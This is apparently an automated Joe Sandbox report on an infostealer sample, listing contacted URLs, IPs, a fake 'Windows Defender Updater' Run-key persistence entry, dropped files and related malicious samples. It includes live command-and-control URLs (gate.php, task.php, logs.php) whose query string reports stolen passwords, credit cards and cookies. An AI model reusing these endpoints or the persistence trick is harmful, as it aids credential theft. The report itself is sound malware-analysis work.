                    http://13.90.128.253/wp-content/lock/gate.php?hwid=CH84D70FD1B3true
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/json/false
                      		high
                      http://13.90.128.253/wp-content/lock/task.php?hwid=CH84D70FD1B3true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabnwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThenwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sakkal.comgEnwY3YpWQVx.exe, 00000000.00000003.311321980.000000001CA61000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311356951.000000001CA5B000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311401237.000000001CA5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://search.yahoo.com?fr=crmas_sfpfnwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://13.90.128.253/wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tiro.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://13.90.128.253nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 7%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designersnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://ip-api.com8nwY3YpWQVx.exe, 00000000.00000002.569907602.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378476557.000001C393879000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sajatypeworks.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cThenwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://13.90.128.253/wp-content/locknwY3YpWQVx.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://fontfabrik.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersenwY3YpWQVx.exe, 00000000.00000003.314516472.000000001CA61000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://ip-api.comnwY3YpWQVx.exe, 00000000.00000002.569907602.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378476557.000001C393879000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379095852.000001C3938C3000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379024467.000001C3938AC000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378328005.000001C39385F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378872263.000001C3938A0000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 00000007.00000002.386427305.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 0000000C.00000002.412836167.00000000028B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleasenwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleasenwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenwY3YpWQVx.exe, 00000000.00000002.562110821.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.377449574.000001C3937E1000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 00000007.00000002.386427305.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 0000000C.00000002.412735902.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sakkal.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://gomorrah.pwnwY3YpWQVx.exe, info.txt.0.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://13.90.128.2538nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.apache.org/licenses/LICENSE-2.0nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.iconwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.ascendercorp.com/typedesigners.html)anwY3YpWQVx.exe, 00000000.00000003.311433877.000000001CA45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchnwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ip-api.comxnwY3YpWQVx.exe, 00000000.00000002.562469151.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379024467.000001C3938AC000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378328005.000001C39385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://james.newtonking.com/projects/jsonNewtonsoft.Json.dll.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.carterandcone.comlnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://search.yahoo.com?fr=crmas_sfpnwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/cabarga.htmlNnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cnnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlnwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.ascendercorp.com/typedesigners.htmlhanwY3YpWQVx.exe, 00000000.00000003.311433877.000000001CA45000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311719685.000000001CA45000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311606763.000000001CA45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://13.90.128.253xnwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		low
                                                                    http://www.fontbureau.com/designers2nwY3YpWQVx.exe, 00000000.00000003.314516472.000000001CA61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      208.95.112.1
                                                                      		ip-api.comUnited States
                                                                      		53334TUT-ASUSfalse
                                                                      13.90.128.253
                                                                      		unknownUnited States
                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                      Analysis ID:753097
                                                                      Start date and time:2022-11-24 10:04:08 +01:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 7m 54s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:nwY3YpWQVx.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:15
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal93.troj.spyw.winEXE@7/10@10/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 140
                                                                      • Number of non-executed functions: 2
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      10:05:04API Interceptor673x Sleep call for process: nwY3YpWQVx.exe modified
                                                                      10:05:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_222410.exe / start
                                                                      10:05:24API Interceptor68x Sleep call for process: Zip.exe modified
                                                                      10:05:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_222410.exe / start
                                                                      10:05:31API Interceptor110x Sleep call for process: update_222410.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      208.95.112.1bryD1wfWrB.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      GooglePlay.apkGet hashmaliciousBrowse
                                                                      • www.ip-api.com/json
                                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/102.129.143.16
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.28561.26060.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/102.129.143.16
                                                                      SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json
                                                                      MDeBRRdude.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/102.129.143.16
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/102.129.143.16
                                                                      Pago.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      AWB NO - 4806763435.jsGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      PO110859600.jsGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      Pendiente.xlsGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/line?fields=query,country,city
                                                                      ReEMZiOPrT_rekova.jsGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      99ObtLprOR.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      install.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      install.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      PO-11085960.jsGet hashmaliciousBrowse
                                                                      • ip-api.com/json/
                                                                      SecuriteInfo.com.Variant.MSILHeracles.47499.17504.29269.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/line/?fields=countryCode
                                                                      install.exeGet hashmaliciousBrowse
                                                                      • ip-api.com/json

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      ip-api.combryD1wfWrB.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.28561.26060.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      MDeBRRdude.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Pago.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      AWB NO - 4806763435.jsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      AT1VkguKRA.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      PO110859600.jsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Pendiente.xlsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      2ayTZa7tZ8.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Profoma Inv 005.xlsmGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      AvL0LCLJKH.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      ReEMZiOPrT_rekova.jsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Modulo.msiGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      99ObtLprOR.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousBrowse
                                                                      • 13.89.179.12
                                                                      https://royaltondevelopment-my.sharepoint.com/:o:/p/john/Ep26iyGIRYNBsV2EDToJI70BM_7gRbGzBrQoe3t_iTtevg?e=05CqVoGet hashmaliciousBrowse
                                                                      • 13.107.213.45
                                                                      http://statics-marketingsites-eas-ms-com.akamaized.netGet hashmaliciousBrowse
                                                                      • 13.107.246.60
                                                                      #Ud83d#Udce0Fax-Inv8738798765678692234323.shtmlGet hashmaliciousBrowse
                                                                      • 13.107.246.60
                                                                      PO__0058754.htmlGet hashmaliciousBrowse
                                                                      • 13.107.246.60
                                                                      kdyk6GXc2I.elfGet hashmaliciousBrowse
                                                                      • 13.78.147.185
                                                                      T4IyxAskuY.elfGet hashmaliciousBrowse
                                                                      • 20.165.178.129
                                                                      ewfDbhCyw3.elfGet hashmaliciousBrowse
                                                                      • 20.68.126.209
                                                                      OnlppUfLJp.elfGet hashmaliciousBrowse
                                                                      • 20.101.86.238
                                                                      AVQ66v3wA5.elfGet hashmaliciousBrowse
                                                                      • 20.48.113.71
                                                                      SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exeGet hashmaliciousBrowse
                                                                      • 40.127.240.158
                                                                      http://scan.cyberessentials.online/usersc/testfiles/macro/CEPlus.xlsmGet hashmaliciousBrowse
                                                                      • 52.109.76.141
                                                                      https://iindexformprot.blob.core.windows.net/index/trial.html?sp=r&st=2022-11-23T10:52:22Z&se=2022-11-27T18:52:22Z&spr=https&sv=2021-06-08&sr=b&sig=ZwgkLDCJs4WfhkBNR8ZWCPALTKhsAm%2B6W1E81Awnu6k%3DGet hashmaliciousBrowse
                                                                      • 13.107.43.14
                                                                      Pay-350 PM SRA 06011.htmlGet hashmaliciousBrowse
                                                                      • 20.230.11.61
                                                                      1RGtHIxh3W.elfGet hashmaliciousBrowse
                                                                      • 20.174.83.162
                                                                      https://bafybeif4l43paaxj3wjik4i4igrl3bymip6qmdswvyy3mvgrzpmcqspvdy.ipfs.w3s.link/ams.htm?email=fred@fred.netGet hashmaliciousBrowse
                                                                      • 13.107.237.60
                                                                      https://armoonoil.ir/armo/?YWNjb3VudHNyZWNlaXZhYmxlQGxvbmdvcy5jb20Get hashmaliciousBrowse
                                                                      • 40.99.150.82
                                                                      https://protect-us.mimecast.com/s/lF5dCKrGLrfJw4QKuM13x7?domain=urldefense.comGet hashmaliciousBrowse
                                                                      • 13.107.43.14
                                                                      PPERTUIT-STATEMENT_YLDRB.HTMLGet hashmaliciousBrowse
                                                                      • 13.107.237.60
                                                                      https://fep365-my.sharepoint.com/:o:/g/personal/frandrade_fep_pt/Evbdtu5ybA5AuLnpVkcdURQBJv2V1NLJ2s_O0cDgO2aY8g?e=phLGs9Get hashmaliciousBrowse
                                                                      • 13.107.6.171
                                                                      TUT-ASUSfile.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      bryD1wfWrB.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      GooglePlay.apkGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.28561.26060.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      MDeBRRdude.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      25z4YRgeJM.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Pago.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      AWB NO - 4806763435.jsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      PO110859600.jsGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      1REffCATuE.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      GuessPkIFZ.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      Kz4sHkc5p5.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      32ki6teCY1.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 208.95.112.1

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll5SUx8Md4kq.exeGet hashmaliciousBrowse
                                                                        file.exeGet hashmaliciousBrowse
                                                                          file.exeGet hashmaliciousBrowse
                                                                            file.exeGet hashmaliciousBrowse
                                                                              NicDx0BvqP.exeGet hashmaliciousBrowse
                                                                                ngyoL1siem.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtfGet hashmaliciousBrowse
                                                                                    AvtoKomander_Installer.msiGet hashmaliciousBrowse
                                                                                      VFMPwzPWjM.exeGet hashmaliciousBrowse
                                                                                        CpLGtq4jBl.exeGet hashmaliciousBrowse
                                                                                          CpLGtq4jBl.exeGet hashmaliciousBrowse
                                                                                            5Qg0FFYoQd.exeGet hashmaliciousBrowse
                                                                                              IBK_Minervasoft.exeGet hashmaliciousBrowse
                                                                                                PO BNB Trends.exeGet hashmaliciousBrowse
                                                                                                  Bm6U0Vj6pa.exeGet hashmaliciousBrowse
                                                                                                    NEW REQUIREMENT..xlsxGet hashmaliciousBrowse
                                                                                                      kKEMJQNDL.exeGet hashmaliciousBrowse
                                                                                                        doc2022020909100101019.exeGet hashmaliciousBrowse
                                                                                                          hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                                                            JpClfGxVOT.exeGet hashmaliciousBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Zip.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2343
                                                                                                              Entropy (8bit):5.374204171243879
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+5HK+HKs:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/qo
                                                                                                              MD5:3F114A073575263E59307B55548FD5F4
                                                                                                              SHA1:971459D541646C4C6B382F06AAFA9F4147716568
